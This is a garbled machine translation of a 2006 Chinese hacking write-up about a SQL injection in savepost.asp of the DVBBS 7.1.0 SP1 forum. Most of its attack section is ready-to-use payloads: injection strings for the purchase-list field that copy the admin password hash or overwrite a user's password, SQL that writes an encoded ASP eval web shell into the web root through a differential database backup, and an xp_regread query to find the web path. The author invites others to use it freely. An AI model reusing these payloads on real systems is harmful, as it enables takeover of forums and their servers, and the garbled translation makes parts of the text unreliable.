The dvbbs7. 1 sp1 latest savepost. asp vulnerability research and use-vulnerability and early warning-the black bar safety net

ID MYHACK58:6220069033
Type myhack58
Reporter 佚名
Modified 2006-05-12T00:00:00


Article author: Eolian prodigal son Information source: evil octal information security team

Moving network Forum(DVBBS 7.1.0 SP1)Savepost. asp there is a serious vulnerability 1 0-May-0 6 Found:Bug. Center. Team Severity: serious Vendor name: dynamic network Forum(DVBBS) Program version: DVBBS 7.1.0 SP1

Vulnerability analysis: Because the program in savepost. asp file in the variable filter is not strict,cause the database processing to generate vulnerability,can be made in the forum permissions as well as webshell and. Has submitted the official review, and by confirming, the patch has been released

Manufacturers patch: 1 8 7 3 6 7&page=1

Latest vulnerabilities came out before saw bct of people in the qq group, selling vulnerabilities to sell 5 0 0 Ocean. Did not think two days less than on the vulnerability. From 1 8 7 3 6 7&page=1 under the patch, and looked, and modified many. A closer look at Savepost. asp, found also to modify many places. How to do it, see the modified in where, had to own down. See below:

If Not IsNumeric(Buy_VIPType) Then Buy_VIPType = 0 If Buy_UserList<>"" Then Buy_UserList = Replace(Replace(Replace(Buy_UserList,"|||",""),"@@@",""),"$PayMoney","") ToolsBuyUser = "0@@@"&amp; Buy_Orders&"@@@"&amp; Buy_VIPType&"@@@"&amp; Buy_UserList&"|||$PayMoney|||" GetMoneyType = 3 ’UseTools = ToolsInfo(4)

Then down to see: Public Sub Insert_To_Announce() ’Insert the reply table DIM UbblistBody UbblistBody = Content UbblistBody = Ubblist(Content) SQL="insert into "&amp; TotalUseTable&"(Boardid,ParentID,username,topic,body,DateAndTime,length,RootID,layer,orders,ip,Expression,locktopic,signflag,emailflag,isbest,PostUserID,isupload,IsAudit,Ubblist,GetMoney,UseTools,PostBuyUser,GetMoneyType) values ("&Dvbbs. boardid&","&ParentID&",’"&username&"’,’"&topic&"’,’"&Content&"’,’"&amp; DateTimeStr&"’,’"&Dvbbs. strlength(Content)&"’,"&RootID&","&amp; ilayer&","&amp; iorders&",’"&Dvbbs. UserTrueIP&"’,’"&Expression(1)&"’,"&amp; locktopic&","&amp; signflag&","&amp; mailflag&",0,"&Dvbbs. userid&","&amp; ihaveupfile&","&amp; IsAudit&",’"&amp; UbblistBody&"’,"&amp; ToMoney&",’"&amp; UseTools&"’,’"&amp; ToolsBuyUser&"’,"&amp; GetMoneyType&")" Dvbbs. Execute(sql)

You can see Buy_UserList this variable filter has a problem, Oh, and this variable in turn leads to ToolsBuyUser this variable has a problem. Is indeed can be injected, huh. In remorse the head of view the patch inside: the insert inside has patch:&dvbbs. checkstr(ToolsBuyUser)&" It seems it should be Is this place. Use up the best is the sql version can updata change the administrator password, or differential backup have to shell. Use way well, first register an id, find a forum posting, the Post content below a selected post type. Select---Forum trading currency settings. Below is the form content.

See the source code:

<option value="">select the post types</option> <option value="0">giving gold patch</option> <option value="1">earn coins patches</option> <option value="2">Forum trading post set</option> </select> Gold coins quantity:<input name="ToMoney" size="4" value=""> <div id="Buy_setting" style="display:none"> Purchase amount limit:<input name="Buy_Orders" size="4" value="-1">(set to“-1”then no restriction)<BR> VIP users browsing option: no need to buy<INPUT TYPE="radio" NAME="Buy_VIPType" value="0" checked="checked"> need to buy<input type="radio" name="Buy_VIPType" value="1" /><br /> Can be purchased user list limit:<input name="Buy_UserList" size="3 0" value="" />(each username with a comma“,”delimiter to separate, note case sensitive) </div>

This is the place, hoho to. The following have a“to buy list limit”, which will fill in: xjy111’,0);update//Dv_User//set//UserEmail=(select[Password]from//Dv_admin//where[Username]=’yellowcat’)//where[UserName]=’qq156544632’;--

Submitted successfully. Look at my Email. Weighs, actually became a blank. Don't know why. To the point directly:

coolidea|||1 2 3’,0);update//Dv_User//set//UserPassword=’469e80d32c0559f8’//where[UserName]=’qq156544632’;--

This back well, first exit, with the admin888 this password directly log on successfully. Well, the statement is no problem, everyone can now play for free, will writing tool, it delphi or something to move out. Directly change the Administrator's password into the background, you can recover the database way to get the shell reference angel articles, dvbbs7. 1sql version can still. Or differential backup, the background can be seen the web absolute path: the

create table aspshell (str image);

declare @a sysname select @a=db_name() backup database @a to disk=’D:\wwwroot\dvbbs7sp1\wwwroot\qq156544632.bak;

insert into aspshell values(0x3C256576616C20726571756573742822232229253e); declare @a sysname select @a=db_name() backup database @a to disk=’D:\wwwroot\dvbbs7sp1\wwwroot\qq156544632.asp’ with differential;

drop table aspshell;

In addition to a get web the absolute path(from the profession owe money brothers to see) create table regread(a varchar(2 5 5),b varchar(2 5 5)); Established a temporary table, storing the read information insert regread exec master. dbo. xp_regread ’HKEY_LOCAL_MACHINE’,’SYSTEM\CONTROLSet001\Services\W3SVC\Parameters\Virtual Roots’, ’/’ Using the xp_regread this function reads the registry information to get the virtual directory path, and stores into the temporary table. update dv_boke_user set boketitle=(select top 1 b from regread) where bokename=’admin’

As for the acess version without research.

Recently is doing graduate design, day busy, no time. Here we discuss go for it. I am a big newbie mistakes, perhaps bct of people found the not of this place yet. This vulnerability to hazards is very large, bct views the dvbbs official and a famous Forum get. I is a local test, would have thought of black anti-to go above test, found that can not send coins attached, almost depressed to death it! Go eat.... Flash.